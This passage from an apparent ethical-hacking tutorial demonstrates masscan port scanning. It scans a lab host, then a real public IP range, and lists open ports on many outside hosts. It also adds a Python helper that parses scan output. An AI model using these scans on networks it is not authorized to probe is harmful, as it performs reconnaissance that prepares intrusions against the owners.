  • Enter the IP 192.168.1.10 in a web browser to check that the iso is working, as shown below.
  • As you can see, the iso is working.
  • Now to scan the above IP address type masscan -p0-8000 192.168.1.10
  • -p is used to enter the port range.
  • Then type the IP address.
root@kali:/home/iicybersecurity# masscan -p0-8000 192.168.1.10
Starting masscan 1.0.6 (https://bit.ly/14GZzcT) at 2019-01-10 18:11:29 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [8001 ports/host]
Discovered open port 445/tcp on 192.168.1.10
Discovered open port 443/tcp on 192.168.1.10
Discovered open port 143/tcp on 192.168.1.10
Discovered open port 80/tcp on 192.168.1.10
Discovered open port 139/tcp on 192.168.1.10
Discovered open port 5001/tcp on 192.168.1.10
Discovered open port 22/tcp on 192.168.1.10
  • The above command shows the open ports of the target IP address. This information can be used in other hacking activities.
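The three scans above each produce a list of "Discovered open port N/proto on IP" lines; on a real network you want those collapsed into a per-host inventory so you can see which hosts expose a given service (445/tcp, for instance) and where to start hardening. The following is an added example, not code from the article or from the masscan project; the parse_masscan_stdout, hosts_exposing and ports_by_frequency helpers are assumptions of this example, and SAMPLE_OUTPUT is constructed from the article's own three scans (with one duplicated line to show de-duplication).

```python
"""Turn masscan's "Discovered open port" stdout lines into a host inventory.

Added example, not from the article or the masscan project. masscan prints one
"Discovered open port N/proto on IP" line per finding; parsing those into a
per-host table gives a defender a quick view of exposed services.
"""
import ipaddress
import re
from collections import Counter, defaultdict

# One line per finding, exactly as masscan prints it to stdout.
DISCOVERED = re.compile(r"^Discovered open port (\d+)/(tcp|udp) on (\S+)$")

# Constructed from the article's three scans; the last line is a deliberate duplicate.
SAMPLE_OUTPUT = """\
Starting masscan 1.0.6 (https://bit.ly/14GZzcT) at 2019-01-10 12:03:11 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Discovered open port 443/tcp on 192.168.1.20
Discovered open port 135/tcp on 192.168.1.20
Discovered open port 912/tcp on 192.168.1.20
Discovered open port 139/tcp on 192.168.1.20
Discovered open port 445/tcp on 192.168.1.20
Discovered open port 902/tcp on 192.168.1.20
Discovered open port 135/tcp on 192.168.1.22
Discovered open port 445/tcp on 192.168.1.22
Discovered open port 139/tcp on 192.168.1.22
Discovered open port 445/tcp on 192.168.1.10
Discovered open port 443/tcp on 192.168.1.10
Discovered open port 143/tcp on 192.168.1.10
Discovered open port 80/tcp on 192.168.1.10
Discovered open port 139/tcp on 192.168.1.10
Discovered open port 5001/tcp on 192.168.1.10
Discovered open port 22/tcp on 192.168.1.10
Discovered open port 445/tcp on 192.168.1.10
"""


def parse_masscan_stdout(text):
    """Return {host: sorted [(port, proto), ...]}; repeated findings collapse."""
    hosts = defaultdict(set)
    for line in text.splitlines():
        m = DISCOVERED.match(line.strip())
        if m:
            port, proto, host = int(m.group(1)), m.group(2), m.group(3)
            hosts[host].add((port, proto))
    return {h: sorted(ps) for h, ps in hosts.items()}


def hosts_exposing(inventory, port, proto="tcp"):
    """Hosts on which port/proto was found open, sorted numerically by address."""
    found = [h for h, ps in inventory.items() if (port, proto) in ps]
    return sorted(found, key=ipaddress.ip_address)


def ports_by_frequency(inventory):
    """[(port, proto, host_count), ...], most widespread service first, then by port."""
    counts = Counter(p for ps in inventory.values() for p in ps)
    return sorted(((port, proto, n) for (port, proto), n in counts.items()),
                  key=lambda x: (-x[2], x[0]))


if __name__ == "__main__":
    inv = parse_masscan_stdout(SAMPLE_OUTPUT)
    for host in sorted(inv, key=ipaddress.ip_address):
        print(host, " ".join(f"{p}/{pr}" for p, pr in inv[host]))
    print("hosts exposing 445/tcp:", hosts_exposing(inv, 445))
    print("most widespread:", ports_by_frequency(inv)[:3])
```

Feeding it real output is a matter of `masscan ... | tee scan.txt` and passing the file contents to parse_masscan_stdout; the same regex also matches masscan's `-oL` list-format lines if you strip their leading "open" token first.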

As explained in the ethical hacking course of the International Institute of Cyber Security, scanning a random IP with a large number of ports may slow down Kali Linux. Use only a limited number of ports, or a short port range. Do not scan any public IP: your Linux distro may hang, and if you scan a large number of ports your ISP may block you, since a large number of requests is sent to the public IP. Sending a large number of packets may also slow down the internet connection.

Analyzing Countries IP Ranges :-

  • Masscan can scan different IP ranges and different ports. Here we have taken China country IP ranges. For IP ranges go to: https://lite.ip2location.com/china-ip-address-ranges
  • Type masscan -v -sS 43.225.84.0-43.225.87.255 -p0-100
  • -v is used to increase the verbosity level.
  • 43.225.84.0-43.225.87.255 is the IP range used in the scan.
  • -sS forces a TCP SYN scan.
  • -p is used to give the port range; we used -p0-100
root@kali:~/Downloads/masscan# masscan -v -sS 43.225.84.0-43.225.87.255 -p0-100

Starting masscan 1.0.4 (https://bit.ly/14GZzcT) at 2019-04-10 05:28:06 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1024 hosts [101 ports/host]
THREAD: status: starting thread
THREAD: xmit: starting thread #0 0:00:00 remaining, found=0
maxrate = 100.00
THREAD: recv: starting thread #0
THREAD: recv: starting main loop
Discovered open port 53/tcp on 43.225.87.113
Discovered open port 53/tcp on 43.225.87.45
Discovered open port 53/tcp on 43.225.87.51
Discovered open port 80/tcp on 43.225.87.31
Discovered open port 53/tcp on 43.225.87.39
Discovered open port 53/tcp on 43.225.87.81
Discovered open port 53/tcp on 43.225.87.34
Discovered open port 53/tcp on 43.225.87.104
Discovered open port 53/tcp on 43.225.87.63
Discovered open port 53/tcp on 43.225.87.22
Discovered open port 80/tcp on 43.225.87.195
Discovered open port 53/tcp on 43.225.87.78
Discovered open port 53/tcp on 43.225.87.65
Discovered open port 80/tcp on 43.225.87.69
Discovered open port 53/tcp on 43.225.87.162
Discovered open port 80/tcp on 43.225.87.70
Discovered open port 53/tcp on 43.225.87.133
Discovered open port 80/tcp on 43.225.87.157
Discovered open port 80/tcp on 43.225.87.118
Discovered open port 80/tcp on 43.225.87.55
Discovered open port 53/tcp on 43.225.87.200
-----------------------------SNIP---------------------------------
Discovered open port 53/tcp on 43.225.87.163
Discovered open port 80/tcp on 43.225.87.201
Discovered open port 53/tcp on 43.225.87.109
Discovered open port 53/tcp on 43.225.87.59
Discovered open port 80/tcp on 43.225.87.28
Discovered open port 53/tcp on 43.225.87.24
Discovered open port 80/tcp on 43.225.87.160
Discovered open port 53/tcp on 43.225.87.54
Discovered open port 80/tcp on 43.225.87.198
Discovered open port 80/tcp on 43.225.87.187
Discovered open port 53/tcp on 43.225.87.77
Discovered open port 53/tcp on 43.225.87.120
Discovered open port 80/tcp on 43.225.87.72
Discovered open port 53/tcp on 43.225.87.83
Discovered open port 53/tcp on 43.225.87.194
  • The above output shows the SYN scan initialising with ports 0-100. The transmit and receive threads start and maxrate is 100.00, i.e. by default 100 packets are sent per second. You can also send a larger number of packets per second to scan IP ranges.
  • Meanwhile we also tried sending a large number of packets; after sending them our internet connection got stuck. The network provider may block your IP address, mentions the ethical hacking professor.
  • To send a large number of packets you need an Intel 10 Gbps Ethernet adapter and a special driver called PF_RING ZC. Download the driver from: https://www.ntop.org/products/packet-capture/pf_ring/pf_ring-zc-zero-copy/
  • While scanning the given IP range, Masscan found ports 80 and 53 open across the range. Port 53 is the DNS port, used for zone transfers (DNS enumeration); it can also be probed by sending UDP packets to port 53.
  • When scanning with nmap, it did not run against this IP range.
  • Type nmap -v 43.225.84.0/255
  • -v is used to increase the verbosity level.
root@kali:~# nmap -v 43.225.84.0/255
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-10 05:45 UTC
Illegal netmask in "43.225.84.0/255". Assuming /32 (one host)
Initiating Ping Scan at 05:45
Scanning 43.225.84.0 [4 ports]
Completed Ping Scan at 05:45, 3.04s elapsed (1 total hosts)
Nmap scan report for 43.225.84.0 [host down]
Read data files from: /usr/bin/../share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.13 seconds
Raw packets sent: 8 (304B) | Rcvd: 0 (0B)
  • Nmap does not scan because we have to use nmap with the -Pn option, as ping might be blocked, explains the ethical hacking professor. Note that nmap also reports an illegal netmask in 43.225.84.0/255 and falls back to scanning a single host (/32). So overall masscan is relatively faster than nmap for any host, because the target IP address range blocks port scanners; with masscan the whole IP range was scanned because masscan has its own TCP/IP stack, while nmap is built on the common networking protocols.

]]>